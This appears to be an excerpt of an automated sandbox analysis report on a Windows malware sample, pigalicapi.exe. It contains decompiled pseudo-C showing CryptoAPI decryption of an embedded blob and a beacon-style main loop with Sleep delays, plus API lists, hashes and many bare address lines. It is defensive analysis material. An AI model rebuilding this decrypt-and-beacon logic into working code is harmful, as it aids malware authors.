                                                                                                                                                                                                                                                                                          										if(_t73 != 0) {
                                                                                                                                                                                                                                                                                          											_t74 = _v816;
                                                                                                                                                                                                                                                                                          											__imp__CryptHashData(_t74,  &_v780, 0x2f0, 0);
                                                                                                                                                                                                                                                                                          											if(_t74 != 0) {
                                                                                                                                                                                                                                                                                          												_v820 = 0;
                                                                                                                                                                                                                                                                                          												_v824 = 4;
                                                                                                                                                                                                                                                                                          												_t76 = _v816;
                                                                                                                                                                                                                                                                                          												__imp__CryptGetHashParam(_t76, 4,  &_v820,  &_v824, 0);
                                                                                                                                                                                                                                                                                          												if(_t76 != 0) {
                                                                                                                                                                                                                                                                                          													_v828 = 0x10;
                                                                                                                                                                                                                                                                                          													_t77 = _v816;
                                                                                                                                                                                                                                                                                          													__imp__CryptGetHashParam(_t77, 2,  &_v844,  &_v828, 0);
                                                                                                                                                                                                                                                                                          													if(_t77 != 0) {
                                                                                                                                                                                                                                                                                          														_t78 = E04007C70( &_v28,  &_v844,  &_v28, 0x10);
                                                                                                                                                                                                                                                                                          														_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                          														if((_t78 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          															E04007B70(_a12,  &_v780, 0x300);
                                                                                                                                                                                                                                                                                          															_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                          															_v5 = 1;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											__imp__CryptDestroyHash(_v816);
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v796);
                                                                                                                                                                                                                                                                                          							goto L21;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L25;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
































                                                                                                                                                                                                                                                                                          0x040047f9
                                                                                                                                                                                                                                                                                          0x04004801
                                                                                                                                                                                                                                                                                          0x04004aab
                                                                                                                                                                                                                                                                                          0x04004ab1
                                                                                                                                                                                                                                                                                          0x04004814
                                                                                                                                                                                                                                                                                          0x04004814
                                                                                                                                                                                                                                                                                          0x0400482a
                                                                                                                                                                                                                                                                                          0x04004832
                                                                                                                                                                                                                                                                                          0x04004850
                                                                                                                                                                                                                                                                                          0x04004850
                                                                                                                                                                                                                                                                                          0x0400485a
                                                                                                                                                                                                                                                                                          0x04004860
                                                                                                                                                                                                                                                                                          0x0400486a
                                                                                                                                                                                                                                                                                          0x04004874
                                                                                                                                                                                                                                                                                          0x0400488f
                                                                                                                                                                                                                                                                                          0x040048b9
                                                                                                                                                                                                                                                                                          0x040048be
                                                                                                                                                                                                                                                                                          0x040048c1
                                                                                                                                                                                                                                                                                          0x040048c7
                                                                                                                                                                                                                                                                                          0x040048cd
                                                                                                                                                                                                                                                                                          0x040048eb
                                                                                                                                                                                                                                                                                          0x040048f3
                                                                                                                                                                                                                                                                                          0x04004a90
                                                                                                                                                                                                                                                                                          0x04004a96
                                                                                                                                                                                                                                                                                          0x04004889
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004889
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004a98
                                                                                                                                                                                                                                                                                          0x040048fd
                                                                                                                                                                                                                                                                                          0x0400490b
                                                                                                                                                                                                                                                                                          0x04004913
                                                                                                                                                                                                                                                                                          0x04004919
                                                                                                                                                                                                                                                                                          0x0400492c
                                                                                                                                                                                                                                                                                          0x0400493c
                                                                                                                                                                                                                                                                                          0x04004944
                                                                                                                                                                                                                                                                                          0x0400494a
                                                                                                                                                                                                                                                                                          0x0400496f
                                                                                                                                                                                                                                                                                          0x04004975
                                                                                                                                                                                                                                                                                          0x04004982
                                                                                                                                                                                                                                                                                          0x0400498f
                                                                                                                                                                                                                                                                                          0x04004995
                                                                                                                                                                                                                                                                                          0x040049a9
                                                                                                                                                                                                                                                                                          0x040049b1
                                                                                                                                                                                                                                                                                          0x040049c5
                                                                                                                                                                                                                                                                                          0x040049cc
                                                                                                                                                                                                                                                                                          0x040049d4
                                                                                                                                                                                                                                                                                          0x040049da
                                                                                                                                                                                                                                                                                          0x040049e4
                                                                                                                                                                                                                                                                                          0x04004a00
                                                                                                                                                                                                                                                                                          0x04004a07
                                                                                                                                                                                                                                                                                          0x04004a0f
                                                                                                                                                                                                                                                                                          0x04004a11
                                                                                                                                                                                                                                                                                          0x04004a2d
                                                                                                                                                                                                                                                                                          0x04004a34
                                                                                                                                                                                                                                                                                          0x04004a3c
                                                                                                                                                                                                                                                                                          0x04004a4b
                                                                                                                                                                                                                                                                                          0x04004a50
                                                                                                                                                                                                                                                                                          0x04004a58
                                                                                                                                                                                                                                                                                          0x04004a6a
                                                                                                                                                                                                                                                                                          0x04004a6f
                                                                                                                                                                                                                                                                                          0x04004a72
                                                                                                                                                                                                                                                                                          0x04004a72
                                                                                                                                                                                                                                                                                          0x04004a58
                                                                                                                                                                                                                                                                                          0x04004a3c
                                                                                                                                                                                                                                                                                          0x04004a0f
                                                                                                                                                                                                                                                                                          0x04004a7d
                                                                                                                                                                                                                                                                                          0x04004a7d
                                                                                                                                                                                                                                                                                          0x040049b1
                                                                                                                                                                                                                                                                                          0x0400498f
                                                                                                                                                                                                                                                                                          0x04004944
                                                                                                                                                                                                                                                                                          0x04004a8a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004a8a
                                                                                                                                                                                                                                                                                          0x04004aa5
                                                                                                                                                                                                                                                                                          0x04004aa5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400485a

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0400482A
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04004834
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04004850
                                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 040049A9
                                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 040049CC
                                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 04004A07
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04004845
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0400481F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
                                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                          • API String ID: 2739279601-947817771
                                                                                                                                                                                                                                                                                          • Opcode ID: 42090ebe0b84d1e6b92d05052a41d8df984fe46a239ada941c44efd33afc4f41
                                                                                                                                                                                                                                                                                          • Instruction ID: 68028e15a08110d1318f396c41aabee13b9dff780772823a15a50aa733777c46
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42090ebe0b84d1e6b92d05052a41d8df984fe46a239ada941c44efd33afc4f41
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E71DF71A54318ABFB65CF50CC45BED77BCAB48B04F408598A605BA1C0DBB9ABC4CF54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 626 4003b00-4003b5c call 4001000 call 4003130 call 4002ed0 GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize call 4004510 635 4003b62-4003c8c call 4007d20 call 4005700 call 4005a00 call 4007d20 call 4009400 call 40099f0 call 4006060 call 4005e00 StrStrIA call 4001120 call 4005e30 call 4006cf0 call 4005f30 call 4009b90 WSAStartup 626->635 636 400400a-400400c ExitProcess 626->636 635->636 663 4003c92-4003cb1 635->663 664 4003cc0-4003cc9 663->664 665 4003cb3-4003cbb 663->665 666 4003cda-4003ce3 664->666 667 4003ccb-4003cd4 664->667 665->664 668 4003cf4-4003cfd 666->668 669 4003ce5-4003cee 666->669 667->666 670 4003d0c-4003d15 668->670 671 4003cff-4003d07 668->671 669->668 672 4003d26-4003d2f 670->672 673 4003d17-4003d20 670->673 671->670 674 4003d40-4003dfd call 4007d20 call 400a700 call 400a4b0 call 4005b50 call 4008a70 672->674 675 4003d31-4003d3a 672->675 673->672 686 4003e49 674->686 687 4003dff-4003e3f call 4007d20 call 40078d0 674->687 675->674 689 4003e53-4003eab call 4007970 call 4004020 686->689 687->686 697 4003eb1-4003ed9 call 4004020 689->697 698 4003f8a 689->698 704 4003f81 697->704 705 4003edf-4003efa call 4004020 697->705 700 4003f91-4003f9a 698->700 702 4003f9c-4003fa3 700->702 703 4003fed-4003ffa Sleep 700->703 706 4003fd0-4003fd7 702->706 707 4003fa5-4003fac 702->707 703->636 703->689 708 4003f88 704->708 713 4003eff-4003f07 705->713 706->703 712 4003fd9-4003fe3 706->712 710 4003fc4 707->710 711 4003fae-4003fc2 707->711 708->700 714 4003fce 710->714 711->714 712->703 715 4003f78 713->715 716 4003f09-4003f50 call 40042e0 call 4004020 713->716 714->703 717 4003f7f 715->717 722 4003f52 716->722 723 4003f59-4003f60 716->723 717->708 722->723 724 4003f62-4003f70 VirtualFree 723->724 725 4003f76 723->725 724->725 725->717
                                                                                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                          			_entry_() {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				char _v1148;
                                                                                                                                                                                                                                                                                          				signed char _v1149;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1156;
                                                                                                                                                                                                                                                                                          				char _v1556;
                                                                                                                                                                                                                                                                                          				char _v9556;
                                                                                                                                                                                                                                                                                          				long _v9560;
                                                                                                                                                                                                                                                                                          				char _v9564;
                                                                                                                                                                                                                                                                                          				char _v12068;
                                                                                                                                                                                                                                                                                          				signed int _v12072;
                                                                                                                                                                                                                                                                                          				char _v12076;
                                                                                                                                                                                                                                                                                          				long _v12080;
                                                                                                                                                                                                                                                                                          				char _v12081;
                                                                                                                                                                                                                                                                                          				long _v12088;
                                                                                                                                                                                                                                                                                          				long _v12092;
                                                                                                                                                                                                                                                                                          				long _v12096;
                                                                                                                                                                                                                                                                                          				signed int _v12100;
                                                                                                                                                                                                                                                                                          				signed char _v12101;
                                                                                                                                                                                                                                                                                          				long _v12108;
                                                                                                                                                                                                                                                                                          				signed int _v12112;
                                                                                                                                                                                                                                                                                          				void* _v12116;
                                                                                                                                                                                                                                                                                          				signed char _t69;
                                                                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                                                                          				signed char _t77;
                                                                                                                                                                                                                                                                                          				signed char _t79;
                                                                                                                                                                                                                                                                                          				signed int _t80;
                                                                                                                                                                                                                                                                                          				signed char _t85;
                                                                                                                                                                                                                                                                                          				signed char _t86;
                                                                                                                                                                                                                                                                                          				signed char _t87;
                                                                                                                                                                                                                                                                                          				intOrPtr _t88;
                                                                                                                                                                                                                                                                                          				char* _t89;
                                                                                                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                                          				signed int _t100;
                                                                                                                                                                                                                                                                                          				signed char _t102;
                                                                                                                                                                                                                                                                                          				signed char _t104;
                                                                                                                                                                                                                                                                                          				signed char _t106;
                                                                                                                                                                                                                                                                                          				signed char _t110;
                                                                                                                                                                                                                                                                                          				signed int _t116;
                                                                                                                                                                                                                                                                                          				signed int _t118;
                                                                                                                                                                                                                                                                                          				char _t125;
                                                                                                                                                                                                                                                                                          				signed int _t138;
                                                                                                                                                                                                                                                                                          				signed int _t140;
                                                                                                                                                                                                                                                                                          				intOrPtr _t143;
                                                                                                                                                                                                                                                                                          				signed int _t159;
                                                                                                                                                                                                                                                                                          				signed int _t161;
                                                                                                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                                                                                                          				void* _t165;
                                                                                                                                                                                                                                                                                          				void* _t173;
                                                                                                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				E04001000(0x2f50);
                                                                                                                                                                                                                                                                                          				_v8 = E04003130();
                                                                                                                                                                                                                                                                                          				E04002ED0(_v8);
                                                                                                                                                                                                                                                                                          				GetModuleFileNameA(0, "C:\Users\hardz\pigalicapi.exe", 0x208);
                                                                                                                                                                                                                                                                                          				SetUnhandledExceptionFilter(E04005DB0); // executed
                                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0); // executed
                                                                                                                                                                                                                                                                                          				_t69 = E04004510(_v8, 0x4013c88); // executed
                                                                                                                                                                                                                                                                                          				_t165 = _t163 + 0xc;
                                                                                                                                                                                                                                                                                          				if((_t69 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          					L39:
                                                                                                                                                                                                                                                                                          					ExitProcess(0);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E04007D20( &_v1148,  &_v1148, 0, 0x46b);
                                                                                                                                                                                                                                                                                          				E04005700( &_v1148); // executed
                                                                                                                                                                                                                                                                                          				_t143 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          				_t74 = E04005A00( &_v1148, _t143, 0xff); // executed
                                                                                                                                                                                                                                                                                          				_v1156 = _t74;
                                                                                                                                                                                                                                                                                          				E04007D20(_t74, "Vatwyovatk", 0, 0x12c);
                                                                                                                                                                                                                                                                                          				E04009400( &_v1148, "Vatwyovatk", 0xa); // executed
                                                                                                                                                                                                                                                                                          				_t77 = E040099F0(); // executed
                                                                                                                                                                                                                                                                                          				 *0x401435a = _t77;
                                                                                                                                                                                                                                                                                          				 *0x401435d = E04006060(); // executed
                                                                                                                                                                                                                                                                                          				_t79 = E04005E00(); // executed
                                                                                                                                                                                                                                                                                          				 *0x401435e = _t79;
                                                                                                                                                                                                                                                                                          				_t80 = StrStrIA("C:\Users\hardz\pigalicapi.exe", "svchost.exe");
                                                                                                                                                                                                                                                                                          				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          				 *0x4014362 =  ~( ~_t80);
                                                                                                                                                                                                                                                                                          				E04001120("C:\Users\hardz\pigalicapi.exe", "pigalicapi",  *0x401435a & 0x000000ff,  *0x4014362 & 0x000000ff, 0x401436c); // executed
                                                                                                                                                                                                                                                                                          				_t85 = E04005E30(0); // executed
                                                                                                                                                                                                                                                                                          				 *0x401435b = _t85;
                                                                                                                                                                                                                                                                                          				 *0x401435f = 1; // executed
                                                                                                                                                                                                                                                                                          				_t86 = E04006CF0(); // executed
                                                                                                                                                                                                                                                                                          				_v1149 = _t86;
                                                                                                                                                                                                                                                                                          				_t87 = E04005F30(); // executed
                                                                                                                                                                                                                                                                                          				 *0x401435c = _t87 & 0x000000ff | _v1149 & 0x000000ff;
                                                                                                                                                                                                                                                                                          				_t88 = E04009B90(0xffffffff);
                                                                                                                                                                                                                                                                                          				_t173 = _t165 + 0x50;
                                                                                                                                                                                                                                                                                          				 *0x4014364 = _t88;
                                                                                                                                                                                                                                                                                          				_t89 =  &_v1556;
                                                                                                                                                                                                                                                                                          				_push(_t89);
                                                                                                                                                                                                                                                                                          				_push(0x202); // executed
                                                                                                                                                                                                                                                                                          				L0400B1E6(); // executed
                                                                                                                                                                                                                                                                                          				if(_t89 != 0) {
                                                                                                                                                                                                                                                                                          					goto L39;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t125 =  *0x40119a8; // 0x1d
                                                                                                                                                                                                                                                                                          					_v12081 = _t125;
                                                                                                                                                                                                                                                                                          					 *0x4014378 = 0x10;
                                                                                                                                                                                                                                                                                          					if(( *0x401435f & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_t118 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                                          						 *0x4014378 = _t118 | 0x00000008;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(( *0x401435c & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_t161 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                                          						 *0x4014378 = _t161 | 0x00000001;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(( *0x401435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_t140 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                                          						 *0x4014378 = _t140 | 0x00000004;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(( *0x401435e & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_t116 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                                          						 *0x4014378 = _t116 | 0x00000002;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(( *0x4014360 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_t159 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                                          						 *0x4014378 = _t159 | 0x00000020;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t91 =  *0x4014361 & 0x000000ff;
                                                                                                                                                                                                                                                                                          					if(( *0x4014361 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_t138 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                                          						 *0x4014378 = _t138 | 0x00000040;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v9564 = 0x9c3;
                                                                                                                                                                                                                                                                                          					E04007D20(_t91,  &_v12068, 0, 0x9c4);
                                                                                                                                                                                                                                                                                          					E0400A700();
                                                                                                                                                                                                                                                                                          					E0400A4B0( &_v12068,  &_v9564, 0x4013cb6,  *0x4013cb4 & 0x0000ffff);
                                                                                                                                                                                                                                                                                          					_v9560 = 0;
                                                                                                                                                                                                                                                                                          					_t97 = E04005B50( &_v12068, ";",  &_v9560, 0); // executed
                                                                                                                                                                                                                                                                                          					_v12072 = _t97;
                                                                                                                                                                                                                                                                                          					_v12092 = 0;
                                                                                                                                                                                                                                                                                          					_v12080 = 0;
                                                                                                                                                                                                                                                                                          					_v12076 = 0x4b0;
                                                                                                                                                                                                                                                                                          					_t98 = E04008A70(0x4012c34,  &_v12076, 0x4012ba8, 0x8c, 0x400e008, 0x254); // executed
                                                                                                                                                                                                                                                                                          					_t177 = _t173 + 0x44;
                                                                                                                                                                                                                                                                                          					if(_t98 != 0) {
                                                                                                                                                                                                                                                                                          						E04007D20( &_v9556,  &_v9556, 0, 0x1f40);
                                                                                                                                                                                                                                                                                          						E040078D0(0x4012c34, 0xc8,  &_v9556, 0xc8);
                                                                                                                                                                                                                                                                                          						_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                                          						_v12092 =  &_v9556;
                                                                                                                                                                                                                                                                                          						_v12080 = 0xc8;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v12088 = 0;
                                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                                          					_v12101 = 0;
                                                                                                                                                                                                                                                                                          					_v12108 = 0x1d4c0;
                                                                                                                                                                                                                                                                                          					_v12096 = 0;
                                                                                                                                                                                                                                                                                          					_t100 = E04007970( &_v12096); // executed
                                                                                                                                                                                                                                                                                          					_v12100 = _t100;
                                                                                                                                                                                                                                                                                          					_t102 = E04004020(_v12096, _v12100,  &_v1148, 1, 2, 0);
                                                                                                                                                                                                                                                                                          					_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                                          					if((_t102 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_v12101 = 1;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t104 = E04004020(_v12092, _v12080,  &_v1148, 1, 5, 0);
                                                                                                                                                                                                                                                                                          						_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                                          						if((_t104 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          							_v12101 = 1;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t106 = E04004020(_v9560, _v12072,  &_v1148, 3, 0xa, 1); // executed
                                                                                                                                                                                                                                                                                          							_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                                          							if((_t106 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          								_v12101 = 1;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_v12116 = 0;
                                                                                                                                                                                                                                                                                          								_v12112 = E040042E0( &_v12116);
                                                                                                                                                                                                                                                                                          								_t110 = E04004020(_v12116, _v12112,  &_v1148, 1, 0x17, 0);
                                                                                                                                                                                                                                                                                          								_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                                          								if((_t110 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          									_v12101 = 1;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if(_v12116 != 0) {
                                                                                                                                                                                                                                                                                          									VirtualFree(_v12116, 0, 0x8000);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if((_v12101 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						if( *0x40118a4 != 1) {
                                                                                                                                                                                                                                                                                          							if( *0x40118a4 == 2) {
                                                                                                                                                                                                                                                                                          								 *0x40118a4 = 1;
                                                                                                                                                                                                                                                                                          								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							if( *0x40130e4 != 2) {
                                                                                                                                                                                                                                                                                          								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_v12108 = 0x3e8;
                                                                                                                                                                                                                                                                                          								 *0x40118a4 = 2;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					Sleep(_v12108); // executed
                                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















































                                                                                                                                                                                                                                                                                          0x04003b08
                                                                                                                                                                                                                                                                                          0x04003b12
                                                                                                                                                                                                                                                                                          0x04003b19
                                                                                                                                                                                                                                                                                          0x04003b2d
                                                                                                                                                                                                                                                                                          0x04003b38
                                                                                                                                                                                                                                                                                          0x04003b40
                                                                                                                                                                                                                                                                                          0x04003b4f
                                                                                                                                                                                                                                                                                          0x04003b54
                                                                                                                                                                                                                                                                                          0x04003b5c
                                                                                                                                                                                                                                                                                          0x0400400a
                                                                                                                                                                                                                                                                                          0x0400400c
                                                                                                                                                                                                                                                                                          0x0400400c
                                                                                                                                                                                                                                                                                          0x04003b70
                                                                                                                                                                                                                                                                                          0x04003b7f
                                                                                                                                                                                                                                                                                          0x04003b8c
                                                                                                                                                                                                                                                                                          0x04003b9a
                                                                                                                                                                                                                                                                                          0x04003ba2
                                                                                                                                                                                                                                                                                          0x04003bb4
                                                                                                                                                                                                                                                                                          0x04003bca
                                                                                                                                                                                                                                                                                          0x04003bd2
                                                                                                                                                                                                                                                                                          0x04003bd7
                                                                                                                                                                                                                                                                                          0x04003be1
                                                                                                                                                                                                                                                                                          0x04003be6
                                                                                                                                                                                                                                                                                          0x04003beb
                                                                                                                                                                                                                                                                                          0x04003bfa
                                                                                                                                                                                                                                                                                          0x04003c02
                                                                                                                                                                                                                                                                                          0x04003c06
                                                                                                                                                                                                                                                                                          0x04003c2a
                                                                                                                                                                                                                                                                                          0x04003c34
                                                                                                                                                                                                                                                                                          0x04003c3c
                                                                                                                                                                                                                                                                                          0x04003c41
                                                                                                                                                                                                                                                                                          0x04003c48
                                                                                                                                                                                                                                                                                          0x04003c4d
                                                                                                                                                                                                                                                                                          0x04003c53
                                                                                                                                                                                                                                                                                          0x04003c64
                                                                                                                                                                                                                                                                                          0x04003c6c
                                                                                                                                                                                                                                                                                          0x04003c71
                                                                                                                                                                                                                                                                                          0x04003c74
                                                                                                                                                                                                                                                                                          0x04003c79
                                                                                                                                                                                                                                                                                          0x04003c7f
                                                                                                                                                                                                                                                                                          0x04003c80
                                                                                                                                                                                                                                                                                          0x04003c85
                                                                                                                                                                                                                                                                                          0x04003c8c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04003c92
                                                                                                                                                                                                                                                                                          0x04003c92
                                                                                                                                                                                                                                                                                          0x04003c98
                                                                                                                                                                                                                                                                                          0x04003c9e
                                                                                                                                                                                                                                                                                          0x04003cb1
                                                                                                                                                                                                                                                                                          0x04003cb3
                                                                                                                                                                                                                                                                                          0x04003cbb
                                                                                                                                                                                                                                                                                          0x04003cbb
                                                                                                                                                                                                                                                                                          0x04003cc9
                                                                                                                                                                                                                                                                                          0x04003ccb
                                                                                                                                                                                                                                                                                          0x04003cd4
                                                                                                                                                                                                                                                                                          0x04003cd4
                                                                                                                                                                                                                                                                                          0x04003ce3
                                                                                                                                                                                                                                                                                          0x04003ce5
                                                                                                                                                                                                                                                                                          0x04003cee
                                                                                                                                                                                                                                                                                          0x04003cee
                                                                                                                                                                                                                                                                                          0x04003cfd
                                                                                                                                                                                                                                                                                          0x04003cff
                                                                                                                                                                                                                                                                                          0x04003d07
                                                                                                                                                                                                                                                                                          0x04003d07
                                                                                                                                                                                                                                                                                          0x04003d15
                                                                                                                                                                                                                                                                                          0x04003d17
                                                                                                                                                                                                                                                                                          0x04003d20
                                                                                                                                                                                                                                                                                          0x04003d20
                                                                                                                                                                                                                                                                                          0x04003d26
                                                                                                                                                                                                                                                                                          0x04003d2f
                                                                                                                                                                                                                                                                                          0x04003d31
                                                                                                                                                                                                                                                                                          0x04003d3a
                                                                                                                                                                                                                                                                                          0x04003d3a
                                                                                                                                                                                                                                                                                          0x04003d40
                                                                                                                                                                                                                                                                                          0x04003d58
                                                                                                                                                                                                                                                                                          0x04003d60
                                                                                                                                                                                                                                                                                          0x04003d80
                                                                                                                                                                                                                                                                                          0x04003d88
                                                                                                                                                                                                                                                                                          0x04003da7
                                                                                                                                                                                                                                                                                          0x04003daf
                                                                                                                                                                                                                                                                                          0x04003db5
                                                                                                                                                                                                                                                                                          0x04003dbf
                                                                                                                                                                                                                                                                                          0x04003dc9
                                                                                                                                                                                                                                                                                          0x04003df3
                                                                                                                                                                                                                                                                                          0x04003df8
                                                                                                                                                                                                                                                                                          0x04003dfd
                                                                                                                                                                                                                                                                                          0x04003e0d
                                                                                                                                                                                                                                                                                          0x04003e2b
                                                                                                                                                                                                                                                                                          0x04003e30
                                                                                                                                                                                                                                                                                          0x04003e39
                                                                                                                                                                                                                                                                                          0x04003e3f
                                                                                                                                                                                                                                                                                          0x04003e3f
                                                                                                                                                                                                                                                                                          0x04003e49
                                                                                                                                                                                                                                                                                          0x04003e53
                                                                                                                                                                                                                                                                                          0x04003e53
                                                                                                                                                                                                                                                                                          0x04003e5a
                                                                                                                                                                                                                                                                                          0x04003e64
                                                                                                                                                                                                                                                                                          0x04003e75
